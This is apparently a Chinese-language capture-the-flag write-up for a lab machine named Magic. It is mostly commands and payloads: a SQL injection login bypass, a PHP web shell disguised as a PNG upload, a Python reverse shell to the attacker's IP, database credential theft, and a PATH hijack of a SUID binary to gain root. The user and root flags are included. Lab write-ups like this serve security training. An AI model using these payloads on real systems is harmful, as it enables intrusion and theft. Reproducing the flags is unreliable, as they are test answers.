信息收集
IP Address | Opening Ports |
---|---|
10.10.10.185 | TCP:22,80 |
$ nmap -p- 10.10.10.185 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLI & 文件上传
$ gobuster dir -u 'http://10.10.10.185/' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html
Apache2.4.x中间件存在一个向上解析漏洞
http://10.10.10.185/login.php
username:admin' or '1'='1
password:xxxx
上传文件
POST /upload.php HTTP/1.1
Host: 10.10.10.185
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.185
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSRyaClLcBoHRDRp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.185/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ld7t5k74b1gjfaaevqcu33hcu5
Connection: close------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="image"; filename="Screenshot_2024-08-08_08_28_47.php.png"
Content-Type: image/png‰PNG<?php system($_GET['cmd']); phpinfo(); ?>
------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="submit"Upload Image
------WebKitFormBoundaryRSRyaClLcBoHRDRp--
通过主页提供的图片地址可以找到文件
curl 'http://10.10.10.185/images/uploads/Screenshot_2024-08-08_08_28_46.php.png?cmd=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'
跳关 & TRPP00F
幸运的是可以利用TRP00F进行关卡绕过,直接从www用户到Root
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999
www-data to theseus
$ cat /var/www/Magic/db.php5
username:theseus
password:iamkingtheseus
通过chisel将3306转发
$ mysql -h 127.0.0.1 -utheseus -p
MySQL [Magic]> select * from Magic.login;
password:Th3s3usW4sK1ng
$ su theseus
User.txt
0f8c7dc6b4de6fc370a9d193350ce15c
权限提升
$ find / -perm -4000 -type f 2>/dev/null
$ strings /bin/sysinfo
环境变量劫持
theseus@magic:~$ echo '/bin/bash'>/tmp/cat;chmod +x /tmp/cat
theseus@magic:~$ export PATH=/tmp:$PATH
theseus@magic:~$ sysinfo
Root.txt
9f8904b0558514cb9b60c6c6985dddbd